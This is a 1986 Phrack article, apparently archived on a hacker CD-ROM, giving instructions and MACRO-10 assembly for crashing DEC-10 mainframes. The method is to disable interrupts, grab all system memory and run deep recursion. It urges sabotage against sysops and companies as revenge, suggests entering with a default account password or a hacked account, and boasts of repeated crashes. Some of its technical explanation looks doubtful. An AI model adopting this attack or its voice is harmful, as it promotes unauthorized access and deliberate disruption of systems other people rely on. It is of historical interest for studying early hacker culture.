home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / zines / phrack1 / phrack4.006 < prev    next >
Encoding:
Text File  |  2003-06-11  |  5.2 KB  |  117 lines
  1.                                 ==Phrack Inc.==
  2.  
  3.                     Volume One, Issue Four, Phile #6 of 11
  4.  
  5.                                Crashing DEC-10's
  6.                               by The Neuromancer
  7.                                     3-13-86
  8.  
  9.  
  10.  
  11.         Occasionally there will be a time when destruction is necessary.
  12.         Whether it is revenge against a tyrannical system operator or against
  13. a particular company, sometimes it is desirable to strike at the heart of a
  14. company...their computer.
  15.         What follows is a fairly detailed explanation of how to go about
  16. crashing a DEC-10 computer running any operating system.  The user will have
  17. to be able to create and execute assembly level and high level language
  18. files, as well as having a good working knowledge of programming.
  19.         The first step is to obtain an account.  Whether this be a default
  20. account like 5,30 (pw: GAMES) or an account that you hacked by some other
  21. method, you have to be able to access the system.  Superuser access is not
  22. necessary, however, for this method to work.
  23.         At the heart of every mainframe computer is the central processing
  24. unit.  The CPU handles all instructions, fetching them from memory, decoding
  25. them, and executing them.  A DEC has what is called a DMA (Direct Memory
  26. Access) Controller that functions as a small CPU handling all the input and
  27. output from memory and peripherals, freeing the main CPU to execute instruc-
  28. tions.  We take advantage of this fact in crashing the system.
  29.         Theory:  The CPU depends on the DMA Controller to handle all memory
  30. access.  If the DMA can be crashed, the CPU grinds to a halt and the sysop
  31. has to run DSK:RAT to restore all the files on the system (a one hour process,
  32. deadly at peak operating time.)  We cause the DMA to crash by slowing it down
  33. incredibly and overflowing the system stack.
  34.         Practice-
  35.         There exists an area known as 'Job Data Area' at octal 20 through 140
  36. of the user's memory.  This stores all relevant information about the current
  37. task executing.  The individual locations each have a 6-bit mnemonic starting
  38. with .JB in each case.  These must be introduced into a symbol table as ext-
  39. ernal references.
  40.         The highest core address available to the user is stored at .JBREL
  41. in the Job Data Area.  If you try to access more core than you are allowed,
  42. you will get an interrupt and it will crash.  The first step is to disable
  43. the interrupt.  This is done by setting bit 22 in the AC to 1.  This is done
  44. with a mask as follows...
  45.         APRENB  AC
  46.         MOVEI   AC,20000 (octal)
  47.         The interrupt is now shut out.  Next, you must start snatching up all
  48. available system core.  This cannot be done by directly meddling with .JBREL.
  49. Instead, you must alter AC (accumulator) to contain the highest desired
  50. address and then move it into .JBREL.  This can be done with the following
  51. subroutine.
  52.         CORE    AC,
  53. TOP:    MOVE    AC,.JBREL##
  54.         AOJA    AC,.+1
  55.         CORE    AC,
  56.         BRA     TOP
  57.         At first, incrementing only by one looks like a slow way to grab core,
  58. but since it is only allocated in chunks of either 1K or 2K words, you can
  59. quickly suck up a lot of memory.  (Following this file is a complete sample
  60. program in MACRO-10 showing how to increase the core to a certain limit.)
  61.         Now that we have all the core we can get, the system is already more
  62. than likely slowing down.  This is good.  Now we put in the fatal blow.
  63. You should already have prepared a program that relies heavily on recursion.
  64. The choice languages for this are either C or Pascal.  Simply set up a simple
  65. recursive program (Towers of Hanoi with 100 rings, for instance), and tell it
  66. to execute.
  67.         What will begin to happen is that the DMA stack will start filling up,
  68. slowing the system down even further.  Eventually, after between 5 minutes and
  69. 15 minutes (longest it's ever taken me), you get the nice beep and...
  70.         ;;OPSER- DEC SYSTEM-10 NOT RUNNING
  71.         I've only had to do this on three systems that the sysop really
  72. pissed me off (not counting the system where I go to school, on which I do
  73. it all the time when I'm bored...)  It's kind of an extreme measure, but
  74. it can be an effective one.
  75.         The following program is a sample for those not familiar with MACRO-10
  76. assembly language.
  77. 32
  78.  
  79. START:  TITLE   SAMPLE
  80.         MOVE    P,[IOWD  3,MEM]
  81.         MOVE    [PUSHJ  P,PDLOV]
  82.         MOVEM   .JBAPR##
  83.         MOVEI   AC,600000
  84.         APRENB  AC,
  85.         SETZB   CT
  86.         MOVEM   AC
  87.         AOS
  88.         PUSHJ   P,S1
  89.         JRST    .-3
  90. S1:     IDIVI   AC,10
  91.         HRLM    N,(P)
  92.         JUMPE   AC,.+3
  93.         PUSHJ   P,S1
  94.         SKIPA
  95.         PUSHJ   P,S2
  96.         HLRZ    N,(P)
  97.         ADDI    N,60
  98.         OUTCHR  N
  99.         POPJ    P,
  100. S2:     SOJG    CT,.+4
  101.         OUTCHR  [15]
  102.         OUTCHR  [12]
  103.         MOVEI   CT,10
  104.         MOVE    T,P
  105.         OUTCHR  [40]
  106.         AOBJN   T,.-1
  107.         POPJ    P,
  108. PDLOV:  PUSHJ   P,LIMIT
  109.         SUB     P,[1,,0]
  110.         JRSTF   @.JBTPC##
  111. LIMIT:  CAIL    1000            ;CHANGE TO WHATEVER YOU WANT!
  112.         EXIT
  113.         POPJ    P,
  114. MEM:    BLOCK   10
  115.         END     START
  116. ===============================================================================
  117.